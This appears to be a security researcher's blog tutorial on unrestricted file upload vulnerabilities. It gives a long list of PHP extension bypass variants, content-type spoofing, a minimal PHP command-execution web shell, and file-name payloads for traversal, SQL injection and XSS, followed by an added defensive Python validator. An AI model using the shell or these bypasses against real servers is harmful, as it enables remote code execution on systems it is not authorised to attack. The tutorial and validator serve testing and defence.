Unrestricted file upload vulnerability

nave1n0x
2 min read, Jan 27, 2020


Hi guys, what's up! This is Naveen, a security researcher. Here I'm presenting my research on unrestricted file upload vulnerabilities.

In this article, we are going to learn about:

  1. What is an unrestricted file upload vulnerability?
  2. What can we do with it?
  3. Types of filters and filter bypass techniques
  4. Exploitation

What is a file upload vulnerability?

A file upload vulnerability is a major problem for web-based applications. On many web servers the impact depends entirely on what the uploaded file is used for: the application lets an attacker upload a file with malicious code in it, and that code can then be executed on the server. An attacker might be able to put a phishing page on the website or deface the website.

An attacker may also reveal internal information about the web server, and in some cases sensitive data may be disclosed to unauthorized people.

What can we do with this?

We can achieve remote code execution through a file upload vulnerability by uploading a PHP shell. Depending on how the uploaded file is handled, we can also achieve XSS, LFI, XXE, phishing, parameter pollution and SQL injection, and the upload may disclose sensitive information such as internal paths.

Types of filters and how they are bypassed

  1. Blacklisting bypass:

Blacklisting can be bypassed by uploading files with less common PHP extensions; some examples are listed below. The most reliable way to bypass this filter is to fuzz the extension.

phtml
php3
php4
php5
inc
pHtml
pHp
pHp3
pHp4
pHp5
iNc
iNc%00
iNc%20%20%20
iNc%20%20%20...%20.%20..
iNc......
inc%00
inc%20%20%20
inc%20%20%20...%20.%20..
inc......
pHp%00
pHp%20%20%20
pHp%20%20%20...%20.%20..
pHp......
pHp3%00
pHp3%20%20%20
pHp3%20%20%20...%20.%20..
pHp3......
pHp4%00
pHp4%20%20%20
pHp4%20%20%20...%20.%20..
pHp4......
pHp5%00
pHp5%20%20%20
pHp5%20%20%20...%20.%20..
pHp5......
pHtml%00
pHtml%20%20%20
pHtml%20%20%20...%20.%20..
pHtml......
php%00
php%20%20%20
php%20%20%20...%20.%20..
php......
php3%00
php3%20%20%20
php3%20%20%20...%20.%20..
php3......
php4%00
php4%20%20%20
php4%20%20%20...%20.%20..
php4......
php5%00
php5%20%20%20
php5%20%20%20...%20.%20..
php5......
phtml%00
phtml%20%20%20
phtml%20%20%20...%20.%20..
phtml......

  2. Whitelisting bypass:

It can be bypassed by uploading a file with tricks such as a double extension (image.png.php) or null byte injection (image.php%00.png).

TIP: Brute-force the extension using the less common extensions listed above to check which ones are accepted.

  3. Content-Type validation bypass:

This validation can be bypassed by changing only the file name while keeping an accepted Content-Type: for example, if the server checks for an image file, keep the Content-Type as 'image/png', 'image/jpeg' or 'image/gif' (the check is usually something like "image/*").

  4. Content-Length validation bypass:

A size limit can be bypassed by using a small payload. Sample payload:

<?php
// Minimal command-execution payload: small enough to pass a size limit
if ($_GET['c']) {
    system($_GET['c']);
}
?>

Other tips:

  1. Set the file name to ../../logo.png or ../../etc/passwd/logo.png to test for directory traversal via the uploaded file name.
  2. Upload a file whose name carries a SQL payload such as 'sleep(10).jpg; you may achieve SQL injection if the image name is saved directly to the database.
  3. Check for .svg file upload; you can achieve stored XSS using an XML payload.
  4. Change the file name to an XSS payload (<svg onload=alert(document.domain)>) and you may achieve XSS.
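As an added defensive example (not code from the original post), here is a Python upload validator that closes the filter bypasses in sections 1 to 4 and the traversal and file-name XSS tips above: it decodes the name once, rejects null bytes and path separators, strips trailing spaces and dots, allows exactly one extension compared case-insensitively against an allowlist, checks the Content-Type for consistency and sniffs the magic bytes instead of trusting the header. The function name, the allowlist and the sample bytes are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# Allowlist of permitted image types: canonical extension -> (MIME type, file signatures).
# The signatures are the real PNG/JPEG/GIF magic bytes; .svg is deliberately absent because
# it can carry script (stored XSS), and no PHP-family extension appears anywhere.
ALLOWED = {
    "png":  ("image/png",  (b"\x89PNG\r\n\x1a\n",)),
    "jpg":  ("image/jpeg", (b"\xff\xd8\xff",)),
    "jpeg": ("image/jpeg", (b"\xff\xd8\xff",)),
    "gif":  ("image/gif",  (b"GIF87a", b"GIF89a")),
}
SAFE_BASENAME = re.compile(r"[A-Za-z0-9_-]{1,64}")

# Constructed sample input: a PNG signature plus padding, enough for the sniff check.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8


def validate_upload(filename: str, content_type: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, detail). On success, detail is the canonical extension to store under."""
    # 1. Decode once, then refuse null bytes, path separators and traversal sequences
    #    (covers image.php%00.png, ../../logo.png and %2e%2e%2f-style variants).
    name = unquote(filename)
    if "\x00" in name or "/" in name or "\\" in name or ".." in name:
        return False, "null byte, path separator or traversal in name"
    # 2. Drop trailing spaces and dots that some filesystems silently strip (php%20%20%20, php......).
    name = name.rstrip(" .")
    # 3. Exactly one extension, compared case-insensitively against the allowlist
    #    (rejects image.png.php, image.php.png, shell.pHp5 and shell.phtml alike).
    base, dot, ext = name.rpartition(".")
    ext = ext.lower()
    if not dot or ext not in ALLOWED:
        return False, f"extension not allowed: {ext or '(none)'}"
    if not SAFE_BASENAME.fullmatch(base):
        return False, "basename has extra dots or unsafe characters"
    # 4. The client's Content-Type must be consistent, but it is never trusted on its own.
    mime, signatures = ALLOWED[ext]
    if content_type.split(";")[0].strip().lower() != mime:
        return False, f"content-type {content_type!r} does not match .{ext}"
    # 5. Sniff the bytes: a PHP script renamed to .png fails here even with a forged header.
    if not any(data.startswith(sig) for sig in signatures):
        return False, "file content does not match its extension"
    return True, ext


if __name__ == "__main__":
    for fname in ("photo.png", "image.png.php", "image.php%00.png", "shell.pHp5", "../../logo.png"):
        print(fname, validate_upload(fname, "image/png", SAMPLE_PNG))
```

Store the accepted file under a server-generated name with the returned extension, outside the web root, so the original file name never reaches the filesystem or the page.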

Written by nave1n0x

Web2 & Web3 Security Researcher, Blockchain Enthusiast, Pentester, Solidity Smart Contract Auditor, My Twitter https://twitter.com/nave1n0x